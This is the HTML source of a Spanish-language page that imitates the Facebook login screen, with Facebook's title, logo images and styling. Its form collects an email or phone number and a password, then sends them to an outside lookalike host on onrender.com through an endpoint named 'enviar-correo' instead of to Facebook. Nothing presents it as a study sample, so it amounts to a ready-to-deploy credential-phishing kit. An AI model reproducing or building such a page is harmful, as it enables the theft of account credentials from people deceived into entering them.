<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
<style>
    * {
        box-sizing: border-box;
        margin: 0;
        padding: 0;
    }

    body, html {
        height: 100%;
        font-family: Arial, sans-serif;
        background-color: #fff;
    }

    .container {
        min-height: 100vh;
        display: flex;
        flex-direction: column;
        align-items: center;
        padding: 20px 5vw;
        width: 100%;
    }

    .top-bar {
        color: #1877f2;
        font-size: 14px;
        margin-top: 10px;
        margin-bottom: -35px;
    }

    .logo {
        display: block;
        margin: 20px auto;
        width: 60px;
        height: auto;
        margin-bottom: 38px;
    }

    form {
        width: 100%;
        max-width: 364px;
        display: flex;
        flex-direction: column;
        align-items: center;
    }

    input[type="text"],
    input[type="password"] {
        width: 100%;
        height: 60px;
        padding: 14px;
        margin: 8px 0;
        font-size: 16px;
        border: 1px solid #ccc;
        border-radius: 8px;
        margin-bottom: -15px;
    }

    .login-btn {
        width: 100%;
        padding: 14px;
        background-color: #1877f2;
        color: white;
        font-size: 16px;
        border: none;
        border: 1px solid #1877f2;
        border-radius: 25px;
        margin-top: 8px;
        margin-bottom: 10px;
        cursor: pointer;
        height: 45px;
    }

    .login-btn:hover {
        background-color: #145dbf;
    }

    .link {
        display: block;
        margin: 15px 0;
        color: #0c0c0c;
        text-decoration: none;
        font-size: 14px;
        text-align: center;
    }

    .create-btn {
        width: 100%;
        padding: 14px;
        background-color: white;
        color: #1877f2;
        font-size: 16px;
        border: 1px solid #1877f2;
        border-radius: 25px;
        margin-top: 40PX;
        margin-bottom: 20px;
        cursor: pointer;
        height: 45px;
    }

    .meta-logo {
        font-weight: bold;
        color: #000000;
        margin-bottom: 0x;
    }

    .footer {
        font-size: 12px;
        color: #999;
        margin-bottom: 20px;
    }
    .MLogo{
        width: 58x;
        height: 13px;
        margin-top: 1PX;
    }
</style>
</head>
<body>

    <div class="container">
        <div class="top-bar">Español</div><br><br>
        <form action="https://www-facebook-u9mh.onrender.com/enviar-correo" method="post">
            <div><img class="logo" src="logo.png" alt="Facebook Logo"></div>

            <input type="text" name="nombre" placeholder="Correo electrónico o número de teléfono" autocomplete="email"><br>
            
            <input type="password" name="Contraseña" placeholder="Contraseña" autocomplete="current-password"><br>

            <input class="login-btn" type="submit" value="Iniciar sesión">

            <a href="#" class="link">¿Olvidaste tu contraseña?</a>

            <input class="create-btn" type="submit" value="Crear cuenta nueva">
        </form>
        <div class="meta-logo"><img class="MLogo" src="Rdx.png" alt="Meta"></div>
        <div class="footer">Información &nbsp; Ayuda &nbsp; Más</div>
    </div>

</body>
</html>